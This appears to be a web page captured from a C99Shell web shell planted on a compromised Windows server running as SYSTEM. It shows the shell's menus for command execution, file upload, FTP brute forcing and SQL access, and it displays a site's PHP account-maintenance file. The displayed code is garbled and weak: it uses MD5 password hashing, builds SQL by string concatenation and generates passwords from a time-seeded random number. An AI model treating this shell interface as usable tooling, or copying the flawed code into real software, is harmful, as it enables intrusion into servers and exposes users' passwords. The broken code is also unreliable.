!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\jaime\Xcode\SPLIB\AccessControl\   drwxrwxrwx
Free 4.03 GB of 39.52 GB (10.21%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AccountMaintenance.php (6.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* @package SPLIB
* @version $Id: AccountMaintenance.php,v 1.2 2005/09/05 05:46:27 kevin Exp $
*/
/**
* Constants which define table and column names
*/
# Modify this constant to reflect session variable name
// Name to use for login variable used in Auth class
@define 'USER_LOGIN_VAR','login');

# Modify these constants to match your user login table
// Name of users table
@define 'USER_TABLE','user');
// Name of user_id column in table
@define 'USER_TABLE_ID','user_id');
// Name of login column in table
@define 'USER_TABLE_LOGIN','login');
// Name of password column in table
@define 'USER_TABLE_PASSW','password');
// Name of email column in table
@define 'USER_TABLE_EMAIL','email');
// Name of firstname column in table
@define 'USER_TABLE_FIRST','firstName');
// Name of lastname column in table
@define 'USER_TABLE_LAST','lastName');
/**
* AccountMaintenance Class<br />
* Provides functionality for users to manage their own accounts
* @access public
* @package SPLIB
*/
class AccountMaintenance {
    
/**
    * Database connection
    * @access private
    * @var object
    */
    
var $db;

    
/**
    * A list of words to use in generating passwords
    * @access private
    * @var array
    */
    
var $words;

    
/**
    * AccountMaintenance constructor
    * @param object instance of database connection
    * @access public
    */
    
function AccountMaintenance (&$db) {
        
$this->db=& $db;
    }

    
/**
    * Given an email address, returns the user details
    * that account. Useful is password is not encrpyted
    * @param string email address
    * @return array user details
    * @access public
    */
    
function fetchLogin($email) {
        
$email=mysql_escape_string($email);
        
$sql="SELECT
                  "
.USER_TABLE_LOGIN.", ".USER_TABLE_PASSW.",
                  "
.USER_TABLE_FIRST.", ".USER_TABLE_LAST."
              FROM
                  "
.USER_TABLE."
              WHERE
                  "
.USER_TABLE_EMAIL."='".$email."'";
        
$result=$this->db->query($sql);
        if ( 
$result->size() == )
            return 
$result->fetch();
        else
            return 
false;
    }

    
/**
    * Given a username / email combination, resets the password
    * for that user and returns the new password.
    * @param string login name
    * @param string email address
    * @return array of user details or FALSE if failed
    * @access public
    */
    
function resetPassword($login,$email) {
        
$login=mysql_escape_string($login);
        
$email=mysql_escape_string($email);
        
$sql="SELECT ".USER_TABLE_ID.",
                  "
.USER_TABLE_LOGIN.", ".USER_TABLE_PASSW.",
                  "
.USER_TABLE_FIRST.", ".USER_TABLE_LAST."
              FROM
                  "
.USER_TABLE."
              WHERE
                  "
.USER_TABLE_LOGIN."='".$login."'
              AND
                  "
.USER_TABLE_EMAIL."='".$email."'";
        
$result=$this->db->query($sql);
        if ( 
$result->size() == ) {
            
$row=$result->fetch();
            if ( 
$password $this->generatePassword() ) {
                
$sql="UPDATE
                          "
.USER_TABLE."
                      SET
                          "
.USER_TABLE_PASSW."='".md5($password)."'
                      WHERE
                          "
.USER_TABLE_ID."='".$row[USER_TABLE_ID]."'";
                
$result=$this->db->query($sql);
                if (!
$result->isError()) {
                    
$row[USER_TABLE_PASSW]=$password;
                    return 
$row;
                } else {
                    return 
false;
                }
            } else {
                return 
false;
            }
        } else {
            return 
false;
        }
    }

    
/**
    * Add a list of words to generate passwords with
    * @param array
    * @return void
    * @access public
    */
    
function addWords ($words) {
        
$this->words=$words;
    }

    
/**
    * Generates a random but memorable password
    * @return string the password
    * @access private
    */
    
function generatePassword () {
        
srand((double)microtime()*1000000);
        
$seperators=range(0,9);
        
$seperators[]='_';
        
$count=count($this->words);
        if ( 
$count == )
            return 
false;
        
$password=array();
        for ( 
$i=0;$i<4;$i++ ) {
            if ( 
$i == ) {
                
shuffle ($this->words);
                
$password[$i]=trim($this->words[0]);
            } else {
                
shuffle $seperators );
                
$password[$i]=$seperators[0];
            }
        }
        
shuffle($password);
        return 
implode ('',$password);
    }

    
/**
    * Changes a password both in the database
    * and in the current session variable.
    * Assumes the new password has been
    * validated correctly elsewhere.
    * @param string old password
    * @param string new password
    * @return boolean TRUE on success
    * @access public
    */
    
function changePassword(& $auth,$oldPassword,$newPassword) {
        
$oldPassword=mysql_escape_string($oldPassword);
        
$newPassword=mysql_escape_string($newPassword);

        
// Instantiate the Session class
        
$session=new Session();

        
// Check the the login and old password match
        
$sql="SELECT
                  *
              FROM
                  "
.USER_TABLE."
              WHERE
                  "
.USER_TABLE_LOGIN."='".$session->get(USER_LOGIN_VAR)."'
              AND
                  "
.USER_TABLE_PASSW."='".md5($oldPassword)."'";
        
$result=$this->db->query($sql);
        if ( 
$result->size() != )
            return 
false;

        
// Update the password
        
$sql="UPDATE
                  "
.USER_TABLE."
              SET
                  "
.USER_TABLE_PASSW."='".md5($newPassword)."'
              WHERE
                  "
.USER_TABLE_LOGIN."='".$session->get(USER_LOGIN_VAR)."'";
        
$result=$this->db->query($sql);
        if ( !
$result->isError() ) {
            
// Set the session variable for the password
            
$auth->storeAuth($session->get(USER_LOGIN_VAR),$newPassword);
            return 
true;
        } else {
            return 
false;
        }
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--